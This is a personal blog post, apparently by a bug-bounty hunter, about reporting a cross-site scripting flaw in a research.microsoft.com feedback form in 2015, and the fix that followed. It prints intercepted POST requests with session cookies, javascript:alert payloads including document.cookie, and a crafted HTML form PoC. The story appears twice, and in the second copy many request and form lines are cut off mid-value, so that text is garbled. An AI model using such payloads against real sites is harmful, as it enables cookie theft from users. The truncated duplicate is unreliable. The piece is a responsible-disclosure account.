Hii
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).
NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in my story Do Ignore.
Link : https://technet.microsoft.com/en-in/security/cc308589.aspx
I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...
so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.
So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(
Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"
Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.
After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link : http://corp.wamba.com/en/developer/security/?fame
So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.
NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049
After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...
As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/ en-us/"
Now, testing Begin's...
On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "
And I Failed....:(
Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.
NOTE : Exactly The Same Report :
------------------------------ -
1. Go to vulnerable Link : http://research.microsoft.com/ apps/mobile/feedback.aspx
2. Put data in form and click on submit meanwhile add proxy & intercept HTTP Request.
Then,
Find Vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...
Original Request :
--------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+ xml,application/xml;q=0.9,*/*; q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/ apps/mobile/feedback.aspx
Cookie: MC1=GUID= 22a3cdbfa8d5904b942b60e36305e4 eb&HASH=bfcd&LV=201508&V=4&LU= 1441034037093;
A=I&I= AxUFAAAAAAAeCQAApxclCNxGFk+ 1KDeEOKYm2A!!&V=4; MUID= 3CE4D5FFCA896F5712EFDDF4CB966E 2D;
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID= 22a3cdbfa8d5904b942b60e36305e4 eb&CS=3&LV=201509&V=1;
km_ai= FA8dlGEvWq66GJiPA83Nhvzj9mY% 3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;
WT_FPC=id= 220af3c63b6e333792214421030209 70:lv=1446427090307:ss= 1446427090307; WT_NVR_RU=0=technet:1=:2=;
omniID=1445758143494_c04d_ 29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0= 64028a0f7e8a4846ac5da7cca81d6d dc
Connection: keep-alive
Content-Type: application/x-www-form- urlencoded
Content-Length: 452
__VIEWSTATE=% 2FwEPDwUJLTgzMTg5OTc5ZGShzpE5t zmEw6CKkKDvGHntFLidc5imff8w7mu 2zy%2FLMQ%3D
%3D&__VIEWSTATEGENERATOR= 716BEBFC&__EVENTVALIDATION=
% 2FwEdAARKJNO6sKLVvRzw7zztCu4Vt MM203w3pCXVfEXN8x4O0jpn2Pr6XjN ySqjv2083yVfNgUlRChClrK8AcSkpy D8s
%2Fz5WZ7D4I2h2W9EhPlJLX2gF% 2BinlORjyb3MDfBMo%2F9Y%3D& ctl00%24bodyPlaceholder
%24hiddenReferer=&Content=1& Design=2&Usability=3&Overall= 4&ctl00%24bodyPlaceholder
%24commentTxt=asadas&ctl00% 24bodyPlaceholder%24submitBtn= Submit
Edited Request :
-------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+ xml,application/xml;q=0.9,*/*; q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/ apps/mobile/feedback.aspx
Cookie: MC1=GUID= 22a3cdbfa8d5904b942b60e36305e4 eb&HASH=bfcd&LV=201508&V=4&LU= 1441034037093;
A=I&I= AxUFAAAAAAAeCQAApxclCNxGFk+ 1KDeEOKYm2A!!&V=4; MUID= 3CE4D5FFCA896F5712EFDDF4CB966E 2D;
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID= 22a3cdbfa8d5904b942b60e36305e4 eb&CS=3&LV=201509&V=1;
km_ai= FA8dlGEvWq66GJiPA83Nhvzj9mY% 3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;
WT_FPC=id= 220af3c63b6e333792214421030209 70:lv=1446427090307:ss= 1446427090307; WT_NVR_RU=0=technet:1=:2=;
omniID=1445758143494_c04d_ 29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0= 64028a0f7e8a4846ac5da7cca81d6d dc
Connection: keep-alive
Content-Type: application/x-www-form- urlencoded
Content-Length: 470
__VIEWSTATE=% 2FwEPDwUJLTgzMTg5OTc5ZGTXCl237 3301Rpe5vIISbXvtNenkjedT% 2Bw1VGl4ldsRqw%3D
%3D&__VIEWSTATEGENERATOR= 716BEBFC&__EVENTVALIDATION=
% 2FwEdAAR2zlRPRPhJi19IJ5naZBSPt MM203w3pCXVfEXN8x4O0jpn2Pr6XjN ySqjv2083yVfNgUlRChClrK8AcSkpy D8sBCl6HiMzA
gi% 2F4d3G3Luo2MkPYCKPbIHIh3MWPVPW xGM%3D&ctl00% 24bodyPlaceholder% 24hiddenReferer=javascript: alert
(123456789)&Content=1&Design= 2&Usability=3&Overall=4&ctl00% 24bodyPlaceholder
%24commentTxt=m&ctl00% 24bodyPlaceholder%24submitBtn= Submit
Response :
------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
NOTE : POC Attached...!!!
And I Failed Again....:(
Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".
As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,
1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.
2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.
SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/ 2007/03/exploiting-xss-in- post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------ ------------------------------ ------------------
1. Save the vulnerable Page in local system : http://research.microsoft.com/ apps/mobile/feedback.aspx
2. Edit source code and add :
</p><form name="aspnetForm" method="post" action="http://research. microsoft.com/apps/mobile/ feedback.aspx" id="aspnetForm">
<input name="ctl00$bodyPlaceholder$ hiddenReferer" id="ctl00_bodyPlaceholder_ hiddenReferer" type="hidden" value="javascript:alert( document.cookie)">
3. Run in page in Local system & click on submit.
4. When form is successfully submitted Click on "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------
Video POC : https://www.youtube.com/watch?v=uokq33ssLdc
So Finally On November 17th 2015 I got the confirmation of Bug Fixed...
Thank You....!!!!
- Raghav Bisht
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).
NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in my story Do Ignore.
Link : https://technet.microsoft.com/en-in/security/cc308589.aspx
I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...
so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.
So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(
Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"
Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.
After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link : http://corp.wamba.com/en/developer/security/?fame
So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.
NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049
After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...
As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/
Now, testing Begin's...
On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "
And I Failed....:(
Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.
NOTE : Exactly The Same Report :
Vulnerable Domain :
------------------------------ --
http://research.microsoft.com/
Vulnerable Link :
---------------------------
http://research.microsoft.com/ apps/mobile/feedback.aspx
Vulnerable Parameter :
------------------------------ -------
hiddenReferer=
XSS Payload :
---------------------
javascript:alert(123456789)
javascript:alert(document. domain)
javascript:alert("XSS____ ALERT_____!!!!_____:_____ Hacked___By___Raghav")
Steps To Reproduce :------------------------------
http://research.microsoft.com/
Vulnerable Link :
---------------------------
http://research.microsoft.com/
Vulnerable Parameter :
------------------------------
hiddenReferer=
XSS Payload :
---------------------
javascript:alert(123456789)
javascript:alert(document.
javascript:alert("XSS____
------------------------------
&
Original Request :
--------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 452
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
%24hiddenReferer=&Content=1&
%24commentTxt=asadas&ctl00%
Edited Request :
-------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 470
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
gi%
(123456789)&Content=1&Design=
%24commentTxt=m&ctl00%
Response :
------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
And I Failed Again....:(
Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".
As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,
1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.
2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.
SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...
Respected...
As per POC for my earlier mail...------------------------------
1. Save the vulnerable Page in local system : http://research.microsoft.com/
2. Edit source code and add :
</p><form name="aspnetForm" method="post" action="http://research.
<input name="ctl00$bodyPlaceholder$
3. Run in page in Local system & click on submit.
---------------------
1. Attacker can host the page and ask for feedback's.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index. php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!Video POC : https://www.youtube.com/watch?v=uokq33ssLdc
So Finally On November 17th 2015 I got the confirmation of Bug Fixed...
Thank You....!!!!
- Raghav Bisht